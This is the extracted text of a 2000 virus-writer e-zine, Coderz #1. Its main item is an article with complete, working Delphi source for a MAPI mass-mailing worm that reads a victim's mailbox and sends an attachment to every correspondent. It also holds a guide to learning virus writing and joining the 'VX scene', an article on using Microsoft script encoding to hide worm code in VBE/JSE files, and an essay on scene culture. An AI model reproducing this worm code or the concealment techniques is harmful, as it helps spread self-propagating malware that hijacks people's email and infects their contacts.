Ezine - Coderz #1

  • May 2020
  • PDF

This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA


Overview

Download & View Ezine - Coderz #1 as PDF for free.

More details

  • Words: 122,949
  • Pages: 434
Gigabyte's Introduction Evul's Introduction

Articles MAPI Worms in C++ and Delphi HomeSlice Viral Introduction Gigabyte Script encoding Zulu Some politically incorrect words about the so-called "scene" Spanska Faster Spreading SnakeByte AV-List SnakeByte Are Anti-Virus Companies Criminals? SnakeByte Some Tipz & trix for Win2k Ratter A few ideas for viruses Kalkin/EViL The protector scene Kalkin/EViL Katja Kladnik (Lucky Lady) Richard Karsmakers, contributed by Al Leitch Anti Avp Vbs I-Worms Detection [K]Alamar Retro the easy way MidNyte How to become the world's richest man MidNyte An Introduction to Encryption, Part III MidNyte

Source Code Win32.Infinite W9x.mATRiX Dildo Tequila Bad Seed Win95.Yildiz CU.1076 Win.Tentacle_II Win32.DDoS

ASM Billy Belcebu/IKX Lifewire/IKX T-2000/IR Disassembled by T-2000/IR Disassembled by T-2000/IR Black Jack Disassembled by Black Jack Disassembled by Black Jack SnakeByte

Win32.CrashOverwrite BeLiAL One Half Disassembled by Ratter HLL Win32.HLLP.Scrambler.b Gigabyte Win32.HLLP.STD Error/Team Necrosis Win32.HLLW.Hop_Along Quilb VBA & VBS AM97.Lea Knowdeth/Metaphase & NoMercyVirusTeam WM97.NoBodyHears AngelsKitten/NuKE NETWORK/OUTLOOK.FakeHoax Zulu WM97.Neclovek Lys Kovick/Metaphase WM97.Unperson Lys Kovick/Metaphase HTML.MSBound Suppa WM97.LSD WalruS WM97/2K.Aida e[ax] WM97/2K.String e[ax] WM97/2K.String2 e[ax] WM97/2K.Blade Necronomikon WM97/Lithium jackie XM97/Fireal jackie Batch HighHopes.c Knowdeth/Metaphase & NoMercyVirusTeam Fuck That 1.0a Deloss/NuKE

Binaries Win32.Infinite Billy Belcebu/IKX IRoK v1.1c Raid/SLAM Win32.HLLP.Scrambler.b Gigabyte I-Worm.Scooter Gigabyte Dildo T-2000/IR NETWORK/OUTLOOK.FakeHoax Zulu Win32.HLLP.Adrenaline Anonymous Win95.Yildiz Black Jack Showdown GzR/NuKE Prophecy GzR/NuKE Win32.CrashOverwrite BeLiAL Win32.HLLP.STD Error/Team Necrosis Knowdeth/Metaphase & NoMercyVirusTeam WordMacro.Blur.a and AngelsKitten/NuKE

Interviews Real Time Interview with Rajaat Interview with Raid/SLAM, about Irok Interview with The Unforgiven Interview with Del Armg0/MATRiX VX meeting 2000 in Czech Republic: Opinions of a few VXers

Tools E-Z Disassembler & Dumper 1.0 GzR/NuKE Word97 VBA SR1 Generator ver 1.1k Knowdeth/Metaphase & NoMercyVirusTeam

Humor Kevin & Kell Bill Holbrook, contributed by SnakeMan The case of the stupid IRCop Raid

Gigabyte's Introduction Hey there.. What is this e-zine? Well, it's mainly an oversight of what's been going on in and around the VX scene the last year. The zine is completely contribution based, as this zine is made by Coderz.net, which isn't a group. I've seen Coderz.net grow from a fairly small website (being Evul's own homepage) to what it is now: A virus information site, hosting several (yeah, okay, shitloads) VX homepages. Maybe this is a moment to say, thanks Evul, for the time and effort you put into Coderz.net. Thanks also goes to: Rajaat, Raid and The Unforgiven: For taking the time to answer the interview questions, Rajaat even in real life (writing the answers down in his hard to read kinda handwriting :) GriYo, Benny, mort and Ratter: For answering the questions about the meeting.. and for the great time at the meeting itself of course :) Roadkil: For HTML help.. and for testing my sunglasses with green and yellow letters on IRC :P EXE-Gency and Del Armg0: For contributing another interview. Everyone else who has contributed viruses, articles, etc.: This zine wouldn't be possible without you. Greets: Evul: Keep your dirty socks away from #virus! :) Spyda: /me bites you :P Queen: Males.. nothing but trouble, right? Raid: How about we all smoke some weed and burn infected users with the hot ashes, hmm? :) Darkman: Walking sex encyclopedia Benny: Lying down on a used condom is not a good idea.. no, not even at a VX meeting! Unless you're called Benny.. Jackie Twoflower: Lz0#2 is nice :) Rajaat: I still hate qwerty keyboards T-2000: Fries and beer! Vecna: Still can't dance? Mandragore: Cheeseburgers :) Several other people in the scene.. I won't fill a whole zine with just this list :) Fuck you: Virus-X (aka Trevelyan or Frieza) Rhape79 Nala The Bughunter (aka CWarrior) Graham Cluley: You damn sexist

Evul's Introduction Welcome to Coderz.Net zine issue 1. After long delay, and lots of procrastination, here it is - humble as it may be. This zine is made up of submissions from many members of the VX scene, and edited in whole, by Gigabyte. We hope you enjoy this zine and coderz.net - and if all goes well, hopefully there will be an issue #2. Coderz.Net was never meant to be what it has become - it simply happened. It started out as a simple homepage, and then a few sites were added, and from there it grew enormously. Over the last year it has been running on the average 80 websites, and taking traffic at rates of over 1.5 million page hits per month at times. I have done my best to make sure that the site is functional for users, and that the site stays up to date, however this has become quite a job lately, due to the size and demand of site. Along with the normal troubles that come with such a site, Coderz has been through major technical problems, threatened, harrassed, attacked, and run out of ISPs by the anger resulting from isolated incidents - yet at over two years of age, its still here and doing fine. The idea of starting a zine was kicked around for a while by myself, and I decided not to, for lack of time and patience to do so myself. A few months later, Gigabyte came to me about doing a zine for coderz, and after lots of ideas/debating she decided to take on the job and put together a zine herself .. great job, Gigs. Back to the workload talked about earlier, we desperately need people willing to dedicate some time to helping with Coderz, so both the site and the zine may continue to grow and improve. Anyone who is interested in helping, we would be happy to hear from you. Email me at [email protected] if you would want to contribute. As part of the "live and learn" process involved in getting this zine out to you, we decided that if there is to be a #2, we will definately need people to help with it. Contact Gigabyte ([email protected]) about the zine. Once again, many thanks to gigabyte for the hard work on this zine, and we appologise for the extended wait for this release. Well, enough of my ramblings, go read the damn zine already! Best Regards, John [email protected]

program mapiworm; uses Windows, MAPI; {$R *.RES} (**************

MAPI Worms in C++ and Delphi

*********************

I haven't seen much documentation on writing a worm via Win32 HLL's so here goes. Nothing revolutionary, just simple API calls. This article is mainly aimed at the beginner, since actually researching this shit by hand is a major pain in the ass and time-consuming. I'm showing the code in Delphi cause it's a bit easier to read and looks nicer than C++. Code can easily be converted to C in about thirty minutes, see Microsoft's MSDN section for a complete MAPI C++ example for the syntax. A ton of code can be snipped before inserting into your personal worm. I figure showing it in "long form" to be nice etiquette for an article-specific program. This upon just very

code was tested on NT 4.0, but might need a revision dependent your OS and how MAPI is setup. And before you laugh at 20k for the worm engine, I checked AVP's site for MAPI and found some large filesize worms doing moderately well in the wild:

I-Worm.PrettyPark: http://www.avp.ch/avpve/NewExe/win32/ppark.stm I-Worm.ZippedFiles: http://www.avp.ch/avpve/worms/zipped.stm I-Worm.WinExt: http://www.avp.ch/avpve/worms/WINEXT.stm I-Worm.Plage: http://www.avp.ch/avpve/worms/Plage.stm Couple of useful links: Info on MAPI hook provider http://support.microsoft.com/support/kb/articles/Q224/3/62.ASP MAPI Address example http://support.microsoft.com/support/kb/articles/Q126/6/58.asp ReadMail example http://support.microsoft.com/support/kb/articles/Q140/3/37.asp *) // Usage: HKEY_CURRENT_USER, 'Software\ImaFaggot', 'GayLesbian' function regReadString(kRoot: HKEY; sKey, sValue: String): String; var qValue: array[0..1023] of Char; DataSize: Integer; CurrentKey: HKEY; begin RegOpenKeyEx(kRoot, PChar(sKey), 0, KEY_ALL_ACCESS, CurrentKey); Datasize := 1023; // RegQueryValueEx(CurrentKey, PChar(sValue), nil, nil, nil, @DataSize); RegQueryValueEx(CurrentKey, PChar(sValue), nil, nil, @qValue[0], @DataSize); RegCloseKey(CurrentKey); Result := String(qValue); end; var MAPIMessage: TMAPIMessage; lppMapiMessage: PMapiMessage; Recip, inRecip: TMapiRecipDesc; msgFile: TMapiFileDesc; MError: Cardinal; MapiSession, iMinusOne, i: LongInt;

bWinNT, bFindFirst: Boolean; ProfileName, sAddress, sProfile, sSentMail: String; sSeedMessageID, sMessageID: array[0..512] of Char; os: TOSVersionInfo; begin // Which Operating System we on? os.dwOSVersionInfoSize := SizeOf(TOSVersionInfo); GetVersionEx(os); bWinNT := (os.dwPlatformId = VER_PLATFORM_WIN32_NT); // Grab default profilename from registry if (bWinNT) then ProfileName := regReadString(HKEY_CURRENT_USER, 'Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles', 'DefaultProfile') else // Standard Windows ProfileName := regReadString(HKEY_CURRENT_USER, 'Software\Microsoft\Windows Messaging Subsystem\Profiles', 'DefaultProfile'); // Fucking Delphi bug won't allow a -1 to be set // within the structure, so we trick it iMinusOne := -1; // Will hold any previous recipients sSentMail := ''; // Logon to MAPI. If no workie, get outta here try MError := MapiLogOn(0, PChar(ProfileName), nil, MAPI_NEW_SESSION, 0, @MapiSession); if (MError <> SUCCESS_SUCCESS) then Exit; except ; end; // Fill in the file structure with our attachment with msgFile do begin ulReserved := 0; flFlags := 0; nPosition := iMinusOne; // Let Outlook handle the file position // Obviously, replace the INI with your worm's path/filename lpszPathName := PChar('c:\windows\system.ini'); lpszFileName := nil; lpFileType := nil; end; bFindFirst := True; // Walk through first fifty messages for i := 1 to 50 do try // Keep up with our MessageID if (bFindFirst) then begin sSeedMessageID := ''; bFindFirst := False; end else sSeedMessageID := sMessageID; // Find a message // MapiFindNext serves as both a "findfirst/findnext" function, dependent // upon if MessageSeed has a value

MError := MapiFindNext(MapiSession, 0, nil, @sSeedMessageID, 0, 0, @sMessageID); if (MError = SUCCESS_SUCCESS) then begin // Obtain the long pointer lppMapiMessage := @MAPIMessage; // Open for Reading, headers only (both faster, and avoids // writing all the god damned attachments to temp directory) MError := MAPIReadMail(MAPISession, 0, @sMessageID, MAPI_ENVELOPE_ONLY, 0, lppMapiMessage); if (MError = SUCCESS_SUCCESS) and (lppMapiMessage.lpRecips <> nil) then begin // Sets info about message recipient with Recip do begin ulReserved := 0; ulRecipClass := MAPI_TO; sAddress := 'SMTP:' + lppMapiMessage.lpRecips.lpszAddress; lpszAddress := Pchar(sAddress); lpszName := lppMapiMessage.lpRecips.lpszName; ulEIDSize := 0; lpEntryID := nil; end; // Clear out to avoid any leftover setting FillChar(MAPIMessage, SizeOf(MAPIMessage), 0); // Fill the MapiMessage structure. // Unnecessary to expand entire struct, but aesthetically pleasing with MapiMessage do begin ulReserved := 0; lpszSubject := PChar('Insert subject for message'); lpszNoteText := PChar('Message text goes here'); lpszMessageType := nil; lpszDateReceived := nil; lpszConversationID := nil; flFlags := 0; lpOriginator := nil; nRecipCount := 1; lpRecips := @Recip; nFileCount := 1; lpFiles := @msgFile; end; // Send the message if (Pos(lppMapiMessage.lpRecips.lpszAddress, sSentMail) = 0) then begin MError := MapiSendMail(MapiSession, {handle}0, MapiMessage, 0, 0); // Store this address, so no duplicate messages are sent sSentMail := sSentMail + lppMapiMessage.lpRecips.lpszAddress; end; end; end; except ; // Process your errors like a man end; try MError := MapiLogOff(MapiSession, 0, 0, 0); except ; end; end.

Gigabyte

Explanation of some words. Before I start, I will explain some words. You will probably not only see these words in Viral Introduction, you might see them in the rest of the zine as well. VX: Virus eXchanging. VXers are those who are pro-virus, collect viruses, write them, exchange them.. AV: Anti Virus. They make virus scanners. Examples are: Anti Viral Toolkit Pro, Norton Antivirus, McAfee... IRC: Internet Relay Chat. People use it to chat, to communicate. There are many different IRC servers, Undernet for example. IRC client: What people use to connect to an IRC server. Examples are: mIRC, PIRCH, Xircon, VIRC.. ASM: Assembly language. This language is most used to code viruses in. TASM: Turbo Assembler. This is most used in the VX scene to assemble ASM source code into executable files. (Requires TLINK) VBA: Visual Basic for Applications. It's a part of the Microsoft Office products. VBS: Visual Basic Scripting language. Can be inside an HTML page. (for more information see the part about script viruses in "What is:", further down in this document. Where to find information about viruses and collecting? Well, I think I should give you some links to virus sites to begin with. Your first stop for finding any VX site should be coderz.net. Check the "Hosted pages" part, you'll find many interesting sites on coderz.net, and they might contain other links to VX sites elsewhere. Coderz.net 29A #virus Homepage Virus Trading Center Tally's Virus Link Reference If you're looking for IRC channels about viruses, you could come to #vir and #virus on Undernet. Watch out: NEVER ask or beg for viruses, you'll get kicked out. And DON'T TURN THE CAPS LOCK ON LIKE THIS, it's annoying, and it looks like you're yelling all the time, or you'll get kicked out. Viruses can be found on the net, if you put in a bit

of effort. If you can’t be bothered, or haven’t got the intelligence to find even a few, then you’re not likely to be helped out. People in the scene will gladly help you out if you put in the effort first to prove you’re not just going to infect someone’s computer. They need to know you’re interested in learning. In which language are viruses written? Mainly in Assembler (ASM), but there are also macro-viruses, which are made in Visual Basic for Applications (VBA). VBA is a part of the Microsoft Office products. There are viruses that are written in other languages, but they're a rarity. Newer is VBS, a scripting language that can be used for making worms or viruses. How to learn how to write viruses? If you wanna learn how to write viruses, you might want to read a tutorial. There are some tutorials in VDAT, for example. VDAT contains a lot of information about viruses, VXers, VX groups and also tutorials about how to write viruses. You can find answers on all kind of virus-related questions in VDAT, you can find some VX history, etc. One warning about VDAT though: it’s currently nearly 10Mb and can take a long time to download. It is definitely worth it though. Also, yes it is an exe, yes it is made by someone interested in viruses, but NO, it is not a trojan as I have been asked before. If you were going to write a trojan, would you make it 10Mb? I guess you’ll have to trust me on that :) Download VDAT from: Coderz.net's FTP And also the Codebreakers magazines are good. Get them from: Codebreakers or Coderz.net's FTP (Most of their tutorials can be found in VDAT) Don't be discouraged when you start out coding, once you get the hang of the simple parts you can go at your own pace with the rest. For which words to search when looking for viruses or information about viruses? Search for: virus, viruses, virii, VX, computervirus The best search engine to use is http://www.hotbot.com for an exact match. This can be useful when URL's of virus sites I gave you are down. How to get into the VX scene? You can meet VXers on IRC. Try #vir and #virus on Undernet. Read some tutorials (see "How to learn how to code viruses?"). Have some patience. You have to get to know the people and they have to get to know you. And learning how to code viruses might also take some time. If you have questions, first look if you can find the answer in VDAT before asking. Start with the first tutorial, not with the last. Don't go to the next until you've finished. Is it illegal? That depends on the country you live in. Usually writing viruses isn't illegal, exchanging isn't illegal either, but spreading is. So if you send someone a virus without informing the person that it's a virus, that would be considered spreading. Always check your country’s laws before doing anything virus-related. Governments don’t generally understand you can be interested in a virus without needing to spread it, if you have a virus they assume you intend to

spread it. Why do people write viruses? There can be many reasons: challenge, fame, buck authority, they want to do something different.. What is: an overwriter: A virus that completly overwrites files to infect them, so it doesn't save the original file. This is what you start with when you learn to code viruses. The host file is completely destroyed so the virus is noticed almost immediately. Have a look at Codebreakers magazine #1, or SLAM magazine #2. an appender: A virus that saves the parts of the infected file that are changed, then writes itself to the end of the host program. At the end of the virus is some code to restore the program (in memory only) and run it. Because the host program still works, your virus has a better chance of going un-noticed than an overwriter. This is explained in Codebreakers magazine #2 or SLAM magazine #3. a prepender: - A prepending virus will write itself to the start of a program instead of the end. This has the advantage of not requiring a calculation called the ‘delta offset’. Don’t worry about this yet, the tutorials will explain it when you get there, I just mention it so you know that there is a difference between a prepender and an appender. encryption: - Encryption is a way to hide the true function of your virus code, and any messages contained in it. An encrypted virus has a decyptor at the start that decrypts the rest of it then passes control to the now unencrypted part. polymorphism: A virus that creates a completely different decryptor every time, to avoid the AV being able to make a scan-string for the virus. TSR: - A virus that stays resident in memory. This can be particularly effective, because any program even listed in a ‘DIR’ command can be infected by a TSR virus. bootsector: - A bootsector is the part of the disk that is read automatically when the computer starts and loads the operating system. A virus that infects here can load before the operating system, and therefor before any AV program can be installed in memory. a macro-virus: Infects MS Office documents, is written in VBA. An example is the Melissa virus. a script virus: A virus made in Java script or VBS. Those languages can be used inside an HTML page, so the virus can be inside the HTML page. That's why they're sometimes called HTML viruses. VBS is also called 'Winscript'. Scripting languages are also good to make worms in. An example is Bubbleboy. How to get recognized? Have patience.. I hope, after you have read Viral Introduction, you've found the information you were looking for, know where to look for tutorials and virus sites and that you know what the VX scene is. Good luck, Gigabyte Thanks a lot to MidNyte, for all the help with the article and suggestions, and to Spyda for the 'Viral Introduction' picture.

Script encoding 09/09/2000 Hi all. First, when reading this, consider that English is not my native language, so expect some mistakes in the text. :) I was going to submit my last worm for the zine, but well, instead of that I decided to write some things about encoded scripts (JScript/VBScript) and only use that worm as an example. With this I mean Microsoft's encoding, not other manual ways of encoding or making your code harder to read. So this is my first article for a zine, most of my viruses/worms where included in many, but just that, not real articles or tutorials.

Script encoding in HTML files Script encoding started with Internet Explorer 5, in that time it was possible to use the "<script>" tag of HTML files to write scripts in JavaScript, JScript or VBScript, but this version added new values for the "language" property of that tag, those values were "JScript.Encode" and "VBScript.Encode". Examples: <script language="JScript.Encode"> <script language="VBScript.Encode"> I said that Internet Explorer 5 started this because it included version 5 of both JScript and VBScript, which are the ones that included this new feature. For encoding your script you need Script Encoder which is available from http://msdn.microsoft.com/scripting. This Win32 command line program will read your HTML file with a script tag having "VBScript" as it's "language" value and it will write a new HTML file with your code encoded and with the "language" attribute changed to "VBScript.Encode". Similar thing happens when using JScript. For example, something like this: <script language="VBScript"> MsgBox "Example" Will be changed to: <script language="VBScript.Encode">#@~^GgAAAA==@#@&P~t/TAWXPr36m:2VJ@#@&7gUAAA==^#~@ Have in mind that this encoding is really designed for casual readers of your code, the truth is that it's trivial and will not protect your code from people that is decided to view it. Of course that this things are only supported in Internet Explorer, not in other browsers. Script languages are not part of the HTML language, not even the "language" attribute is part of HTML 4, the correct attribute would be "type", but well, that is another matter that is not virus related. At the time of writing this I know only one virus using this feature in HTML files, it is HTML.Lanus which I wrote time

ago. Anyway, I explained script encoding in HTML files to show how it was possible, but as we know, HTML files are not a real target for viruses since scripting in them needs authorization from the user when using most needed objects unless we are using some kind of bug to skip the warning message.

Script encoding in Windows Script Host Windows Scripting Host 1 (also known as WSH in this text) was included for the first time in Windows 98. It supported JS (JScript) and VBS (VBScript) files to do scripting, and with this, a new type of viruses was started by Lord Natas. No encoding was possible. Time later Windows Scripting Host changed it's name to Windows Script Host and version 2 was out. One of the things that this new version added was the possibility of encoding our scripts like it was possible with HTML files by using two new extensions, JSE and VBE. JSE are JS files after using the encoder, the same happens with VBE and VBS. For using the encoder with JS and VBS files is the same as with HTML files, it reads a VBS file with our script and it creates a VBE file which has our encoded script.

NETWORK/OUTLOOK.FakeHoax NETWORK/OUTLOOK.FakeHoax is an example of script encoding in Windows Script Host. It is the first virus/worm using the JSE and VBE extension (at least not as auxiliary files), so it has two versions, one in JScript and other in VBScript. It uses OUTLOOK and the network shares for spreading. The main code is a COM object written in XML and VBScript using Windows Script Component, so the code in the JSE and VBE file is trivial. Both versions create a WSC file (the COM object defined in XML) and then both call methods and change properties of that object, no real spreading code is in those files. The worm was written in this way to make it easier to port it to any other language, this way I was able of creating a JSE and a VBE file without really porting the main code. Also, it's possible to create new versions using Delphi, Visual C++, or any other by using "REGSVR32.EXE" to register the WSC file as a COM object before calling it's methods or changing it's properties. This worm was written to show how JSE and VBE files could be used in viruses/worms, since before this they where only used as auxiliary files (some versions of HTML.rahC by 1nternal and OUTLOOK.Monopoly by me for example). Besides, since it needs Windows Script Host 2 or later, it won't be good spreading itself at the time of writing this. Also, this was a good opportunity for using Windows Script Component for the first time because it made possible to write a JScript and a VBScript version without needing to port the whole code, so this is also the first virus/worm using it's own COM object. NETWORK/OUTLOOK.FakeHoax text file including source code: network_outlook.fakehoax.txt. NETWORK/OUTLOOK.FakeHoax ZIP file (text file and working copies of the worm): network_outlook.fakehoax.zip.

Script encoding support When writing viruses you must know in which systems your code will work. Even that script encoding is not new, it was not a valid feature for viruses since not many systems supported it. But this is changing in this days and encoding is now possible for a worm with good spreading capabilities. Script encoding in HTML files: supported in any system with JScript/VBScript 5+ (included in Internet Explorer 5+).

JSE and VBE files: supported in any system with Windows Script Host 2+ (included in Windows 98 SE, Windows 2000 and Windows Me). Also, JScript/VBScript 5+ and Windows Script Host 2+ can be installed as separate packages. For example, an encoded script in a HTML file could be run in Internet Explorer 4 if JScript/VBScript 5+ separate package is installed.

Trick to run JSE and VBE files in systems with WSH version 1 By using a trick I found, JSE and VBE files can be run in systems with WSH version 1 instead of version 2 if JScript/VBScript 5+ is installed. Let's see an example, a system has Windows 98 (not Windows 98 SE) and Internet Explorer 5 installed. WSH 2+ separate package was not installed. So this system has WSH 1 and JScript/VBScript 5, since WSH 1 was included with that Windows version (unless it was not selected in a custom installation) and JScript/VBScript 5 was included with Internet Explorer 5. This system is able to understand encoded scripts, it just doesn't has the JSE and VBE extension support. So to run a JSE or VBE file we can create a WSH file that calls the encoded script. This means that instead of running a VBE file directly (not possible in the example), we can run a WSH file (which is supported in WSH 1) that runs a VBE file. This method was used in OUTLOOK.Monopoly, the worm was a VBS file that created a WSH and a VBE file and then runs the WSH file, so the main code was encoded and it worked in the first edition of Windows 98 with Internet Explorer 5 installed. WSH 2+ was not needed in this worm. I won't explain how WSH files work, to know more about them, create a JS file and then view it's properties, changing some of them will create a WSH file in that same directory. Then view it and play with those values. :)

Other file types in which script encoding may be used Script encoding can be used in any file format that accepts the "<script>" tag. Anyway some file formats like WSC and WSF are not supported by the actual version of Script Encoder, but you can include encoding in those file types by creating the "<script>" tag in a HTML file and then copying the encoded code to the WSC or WSF file. Script Encoder recognized extensions are ASA, ASP, CDX, HTM, HTML, JS, SCT and VBS.

Script encoding and viruses You can use this feature in HTML viruses/worms even that they are not something very interesting, or you may use it in worms in JSE or VBE format, which will be better methods. Normal viruses in JSE and VBE format are not interesting since it would be like JS and VBS viruses, there are not many files to infect since they are not used much by people, well, maybe you can find lot's of them in my computer since I'm so crazy about scripting and I use it for lot's of simple tasks, but most users don't use WSH. :) Also, encoding won't make a file simple to infect, since it would be necessary to decode it, infect it and then encode it again. This days there are a lot of worms in VBS files (not happening the same with JScript ones), well, all this worms could be easily encoded. Encoding VBS files will have two advantages:

1) The code will be encoded, so it will be harder to read and most users won't do that. 2) VBS files are a known target for worms, but VBE files are not. So VBE extension is far better for them. But there are also two disadvantages: 1) Some old systems may not be able of running VBE files. 2) The script will be a few bytes bigger. But they are only a few so this is not really a big disadvantage. Well, that's all, let me know in case of any error you find about technical things or for any question you have. Bye all. Zulu [email protected] http://coderz.net/zulu

Some politically incorrect words about the so-called "scene"

[by Spanska, written for Coderz.net e-zine]

- Ethnographic introduction Virus writers and all people classified globally under the "Vx" label are an interesting population to observe. Especially if you can have a look from the inside, and, at the same time, if you're not involved enough, in order to be able to see the "scene" from an independant and exterior point of view. I think i qualify here. I'm around since a few years, met some coders in real life, wrote some viruses, but at the same time i was never member of any group, i'm old enough to be able, i hope, to think with some distance, and these last monthes i basically had better things to do than to write code. - Don't ask "How much time you spend on IRC?", but ask "Show me your code!" The main problem of the "scene" can be spelled in three letters: IRC. I'm impressed to see how people spend so much time chatting about everything except virus coding techniques. They think that to be a real virus writer, you need to be accepted in some virus channel, and then spend twelve hours a day there. High dosis of IRC induces a sort of twist in reality perception, because people behave there very differently from real life. How many people we saw, and we will see, very proud of their brand new op, kicking, banning, laughing about infected users, acting as some powerful agressive elite. Even if they never produced one single line of code. Even if they never did anything useful for the Vx community. Even if their only production is a twenty line macro-virus. Even if they have to go to school the day after, where they will not be "DarkLordz" or "KillerGod" anymore, but normal average teens who have to do their homework. If you think you're a mature person, and i guess most of us are, behave as a mature person even on IRC. You may think i exagerate when i talk about this twist of reality. Unfortunately, i can cite lots of examples. Let's take one that everybody heard about. This coder, no need to tell his nickname, according to his own words, sent logs to some anti-virus people showing that another coder was actively spreading viruses, to "protect one or two channels from being deleted by Undernet". Basically, that means that the existence of IRC channels is more important that a real person's life. Because, unfortunately, nowadays, spreading viruses can lead directly to some years in jail, depending on the laws in your country. Which means a destroyed life. Just to "save a channel". You see

the twist. I'm pretty sure now the guy in question recognizes the big error he made, and i hope he learnt from that, but anyway, it's too late. This example was of course a bit unique in his importance. But it's typical of a state of mind very widespread in the Vx community. People think an op is the most important thing in life. They thing their rank level in the channel's bot is the only important thing, proportional to their eliteness. Twist again. Importantly, this changes the communication and the behaviour between people. Who is going to criticize the owners of their favourite channels? Or more generally, people with a higher level? This leads to hypocrisy, which is very widespread in the community. I saw too much examples of guys and girls spending so much time on IRC that everything that happened there, even the most anecdotical fights, was taking a huge importance. Let me tell you: if you need a computer and to be connected to feel human emotions like pain, angryness, friendship or love, there is something wrong. Really. IRC has another problem. It's dangerous. It seems that Vx people never learnt the lessons from the Melissa case. They don't care about encryption, they don't care about remailers, they don't care what they say on-line can be used to profile or trace themselves or, even more importantly, some of their friends. They keep megabytes of sensitive IRC logs and old mails. They just don't care until the worst happens. Virus writing and spreading is no more a funny game. It's a dangerous criminal activity, and you have to take this fact in account, especially if you spread your viruses, or have friends who do that. This is the main revolution in Vx Land these recent years. Now they are seriously after us. And nobody cares. - Vxers as crickets Let's talk about another interesting behaviour in the Vx scene: the flocking in groups. That's funny how people who repeat so often that they are independant, or think different, do all their possible to integrate or create some clan with similar people, and then be proudly tagged as a member of a larger entity known as a Vx group, with its own set of new rules and laws they have to conform to. Like sheeps. The analogy is not here just as a cheap provocation. It's a very old animal behaviour. Individuals are weak; if they flock, they are stronger against all possible ennemies. Or at least they feel stronger. Crickets are a good example. Whenever they form a very large group, their behaviour changes completely and they become much more agressive. They are no more afraid of predators. It's very funny to see the same kind of basical animal regression in Vx crowds. Or maybe it's just to get some form of reconnaissance. People with no skill, or people afraid to learn (because we were all lamers at day zero, we should not forget that) know that they will never be accepted in the community for their own merits. So they need a sort of official tag to prove to others and maybe even more to themselves that they are part of Vx scene. This mark is provided by the membership in some group, which provide easily and quickly an official entrance ticket into the scene. No need to produce anything useful, now. You are already inside the community, even by a totally artificial way. Here again, examples are numerous. Was it one year ago that a new mainly englishbased group appeared, totally over-hyped, with every newcomer wanting to integrate? They did nothing, most of their members were just plain unknown, but you couldn't miss their presence on IRC. Everybody laughed at them, but nobody told them directly that they were totally ridiculous, for example with their "public relation department"

(more on that later), and other really laughable things. Yet, again, IRC was the main "scene" participation. Where is the code? I think now this group returned to the dust it appeared from, but who really cares? I remember too these ridiculous but finally rewarded ass-licking efforts by a coder (who is a cool and very intelligent guy, but anyway) to integrate a high-profile group. Once he was at last able to glue this wellknown tag to his nickname, he reached his goal, and just disappeared. He never coded anything else. People sometimes tell me: "being member of a group is a good way to motivate". If you need to be motivated or gently forced to be a vxer, it should be a better idea to spend your time fishing, or doing something you don't need to be motivated for. Forget for a moment the question "how to be a vxer" (and basically, if you still don't know the answer, it's time to return to your stamp collection), but ask yourself the more important question: why do you want to be a Vxer? For the hype? Because it's cool? Because people will fear you? Because you want to satisfy your ego? Because your want to impress your girlfriend or your mom? Because you're looking for on-line friends? Or just because you are curious, you want to code and learn some new knowledge? - I'm soooo afraid to talk with normal people! Another strong critic and clear sign of immaturity that comes to mind. Most of the Vxer are not able to argument with people from the two other sides of the virus triangle: antivirus people and infected users. There is a good place for that: alt.comp.virus on Usenet. A mainly anti-virus group nowadays, unfortunately, with some non-interesting parrots, but anyway, the only place where you can directly and publically discuss with members of the anti-virus industry. They have their share of big hypocrisy, ego, closed mind, of course, but i'm not talking about them right now. These guys, and some of them are very smart, have a lot of tough arguments to oppose to us. The easy way, used by most of Vx people, is not to participate in this group, and avoid any kind of discussion. Or just to pop up here once, insult everybody, and jump back to their hole. What does it mean? Easy: virus writers are not enough open-minded to quietly discuss with people opposing them, listen and contradict some opposite argumentation. Or maybe they are not smart and mature enough to engage in an adult discussion. It is kind of funny because Vx often ask for people to be open-minded about virus writing activities. Instead of bashing the largely beloved Nick Fitzgerald on IRC, where he is not, what about trying to argue against him publically in the newsgroup? Of course, it may be a bit tougher, due to his rhetorical skills. Some vx people told me that they don't participate in this forum because it's a mainly AV group. Think a bit more about this argumentation. It's kind of recursive, a bit like an infinite loop, to use coding terms. It looks like an auto-realizing prophecy. In other words, it's plain stupid. - Ego scene I could talk more about the grossly over-inflated ego of most of us (me included), but my hour of reflexion is over. Anyway, just as an example, i always find funny the dramatic and emphatic farewells from people leaving the "scene", although they generally never produced anything noticeable, texts apparently always written with some emotion. If you want to leave, just disappear silently and return to where you came from, nobody will notice anyway, keep contacts if you want, and don't bother people with your ridiculous tears in the eyes and other "official" retirement. The day you decided to become a vxer, you didn't issue a public statement "People, listen to me, today i officially join the vx scene!". So, do the same when you leave. Every other way

to stop is just a desesperate and childish call for attention, from people who didn't receive enough of it for their production during their career, an ultimate try to turn people eyes in their direction for one or two minutes. This impression is even worsened when the guy gives, as a reason, "there is too much shit in the scene these days", or something like that. That clearly means that they were not here to code and to learn. They probably needed to be accepted in whatever community to find some other people to talk with. What about the Barbie doll collector scene? Now i think about it, the utimate case of lameness is the guy who declares everywhere that he quits, and is actually still around. Not even able to follow his own words. Another example, linked with the group problem. It seems that some people create a group for the only excitement to become a boss, to be able to recruit people, command them, and fire them if needed. People always need to find other people even more lame than them to enhance themselves, it's an eternal law of the human beings. Same mechanism of false and artificial feeling of power than in IRC. It's "my" group, "my" board, "my" zine, "my" channel, and there i am the king. More generally, a rigid hierarchy in a group is a clear signal of lameness. Newcomers, please notice how the best groups around have no hierarchy at all. Maybe one guy who centralizes the material for the zine, and that's all. Every attempt to mimick the real world (a company for example, with different departments) is condamned to be considered as extremely lame and poorly productive; and i don't even talk about the irony to see newcomers in the underground trying very quickly to imitate the mechanisms of the normal world. Didn't you come in the vx world in part because it looked different? That's why everybody laugh when a group creates this peak of extreme ridiculousness, a "Public Relation" department. It's clearly a way to admit "we have nothing to say, but anyway, there is a guy in charge of that". It's a way to show to everybody your nombrilist and egocentric view of the scene, because you think every journalist around is going to be interested by your new group, you will be submerged by interview requests, users will ask you about your viruses, you will do the first page of the New York Times. In your dreams. - Delicate conclusion I sometimes think that the Vx scene is mainly composed by boring IRC teens, who don't really know what life (i mean the real life) is all about, who are not interested in learning, but in posing as some elite lordz of Darkness. It may be partially true, or partially wrong, depends on how you look at it. Anyway, i don't really care. A minority of people are interesting enough, as human beings, or coders, or both, and that's the only important thing, at least for me. I don't care about all the microscopic IRC wars, the anecdotic group fights, the childish agressivity. Maybe that's because i'm a bit old, but i think i've learned how to filter important things from the 